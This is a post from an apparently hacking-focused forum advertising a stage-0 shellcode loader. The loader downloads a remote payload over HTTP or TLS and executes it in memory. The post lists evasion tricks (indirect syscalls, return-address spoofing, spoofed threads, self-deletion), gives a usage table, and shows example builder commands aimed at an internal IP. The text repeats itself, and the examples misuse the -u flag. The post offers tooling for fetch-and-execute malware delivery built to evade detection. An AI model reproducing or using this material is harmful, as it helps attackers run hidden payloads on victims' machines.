dEEpEst
☣☣ In The Depths ☣☣
Staff member
Administrator
Super Moderator
Hacker
Specter
Crawler
Shadow
- Joined
- Mar 29, 2018
- Messages
- 13,861
- Solutions
- 4
- Reputation
- 32
- Reaction score
- 45,552
- Points
- 1,813
- Credits
- 55,350
7 Years of Service
56%
Stage 0 Shellcode to Download a Remote Payload and Execute it in Memory
The Nt API calls
LoadLibraryA and WinHTTP calls are performed with return address spoofing.
When the shellcode is executed in a spoofed thread, the stage 0 self-deletes from memory.
Example :
The Nt API calls
NtAllocateVirtualMemory and NtProtectVirtualMemory are made using indirect syscalls.LoadLibraryA and WinHTTP calls are performed with return address spoofing.
When the shellcode is executed in a spoofed thread, the stage 0 self-deletes from memory.
Usage
| Option | Description | Required | Default Value |
|---|---|---|---|
| -e | Http endpoint | Yes | |
| -u | Http uri | Yes | |
| -p | Http port | Yes | |
| -a | User agent | No | Mozilla/5.0 (Windows NT 10.0; Win64; x64) |
| -s | Use TLS | No | Empty |
| -v | View shellcode at C format | No | Empty |
Example :
python3 builder.py -u 10.10.100.121 -u /path/to/shellcode.bin -p 80python3 builder.py -u 10.10.100.121 -u /path/to/shellcode.bin -p 443 -spython3 builder.py -u 10.10.100.121 -u /path/to/shellcode.bin -p 8080 -v
Download: